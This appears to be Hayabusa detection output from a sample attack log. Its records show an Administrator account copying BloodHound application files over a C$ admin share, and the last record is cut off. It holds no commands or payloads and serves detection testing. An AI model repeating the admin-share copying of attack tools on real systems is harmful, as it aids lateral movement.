Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 
Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers : IP 